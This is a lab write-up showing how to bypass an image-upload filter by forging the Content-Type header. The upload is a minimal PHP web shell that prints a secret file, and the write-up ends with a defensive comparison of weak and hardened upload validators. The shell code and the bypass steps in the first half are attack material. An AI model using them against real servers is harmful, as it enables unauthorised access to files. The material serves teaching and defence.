Info:
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
Goal:
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
First I will open the app and upload a PHP file.
shell.php has this content:
<?php
// Print the contents of the target file in the HTTP response
echo file_get_contents('/home/carlos/secret');
?>
After uploading it, we get an error message.

It says the file type is not allowed and that only image/jpeg and image/png are accepted.
so i will add the
We will replace the content type in the request and set it to: Content-Type: image/jpeg

Send it and we get 200 OK.
Now we need to access the uploaded file by its URL.
We go to /files/avatars/shell.php

Congrats, we solved the lab.
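
The upload check fails because it trusts the Content-Type header sent with the request. As an added example (not the lab's code and not part of the original write-up), the following contrasts that kind of check with one that inspects the file content and chooses the stored name on the server; the function names and the `$_FILES`-style array are assumptions.

```php
<?php
// Added example: hypothetical upload validators, not the lab's code.

// Weak check: $file['type'] is copied from the Content-Type header of the
// uploaded part, so the client decides what it says.
function weak_check(array $file): bool
{
    return in_array($file['type'], ['image/jpeg', 'image/png'], true);
}

// Hardened check: ignore the client-declared type and file name.
// Returns a server-chosen file name, or null when the content is not an
// allowed image type.
function hardened_check(array $file): ?string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

    // Detect the type from the bytes on disk, not from the request.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        return null;
    }

    // Random base name plus an extension derived from the detected type,
    // so the stored file never keeps a client-supplied ".php" suffix.
    return bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
}

// Constructed sample: a script uploaded with a forged Content-Type,
// shaped like one entry of $_FILES.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php echo 'constructed sample'; ?>");
$upload = ['name' => 'shell.php', 'type' => 'image/jpeg', 'tmp_name' => $tmp];

// Compare how each check treats the same upload.
var_dump(weak_check($upload));
var_dump(hardened_check($upload));

unlink($tmp);
```

Content sniffing alone can be fooled by a file that is both a valid image and contains script text, so the upload directory should also be configured so that the server never executes files stored in it.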